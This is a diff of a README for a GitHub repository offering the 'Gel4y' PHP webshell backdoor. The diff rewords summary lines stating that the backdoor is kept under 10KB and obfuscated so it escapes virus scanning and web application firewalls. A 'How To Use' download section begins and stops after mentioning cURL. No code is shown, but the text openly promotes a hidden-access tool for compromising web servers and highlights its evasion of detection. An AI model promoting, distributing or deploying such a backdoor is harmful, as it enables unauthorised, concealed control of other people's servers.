22XploiterCrew-Team/Gel4y-Mini-Shell-Backdoor/README.md

 Summary
 ----------

-Gel4y Webshell is a backdoor that was built using the PHP programming language with the PHP procedural method in stealth mode where the file size is only <10KB, using the [nano shell](https://github.com/22XploiterCrew-Team/Shellmon) method so it easily escapes virus scanning.
-Every PHP function has been obfuscated to avoid some firewall systems (WAF) blocking some PHP functions that are considered dangerous.
+Gel4y Webshell is a backdoor built using the PHP programming language with the PHP procedural method in stealth mode where the file size is no more than 10KB, using the [nano shell](https://github.com/22XploiterCrew-Team/Shellmon) method so it can easily escape virus scanning.
+Every PHP function has been obfuscated to avoid some firewall systems (WAF) that block some PHP functions that are considered dangerous.
 ### How To Use
 You only need to download the files in this repo, there are several easy ways that you might try
 * cURL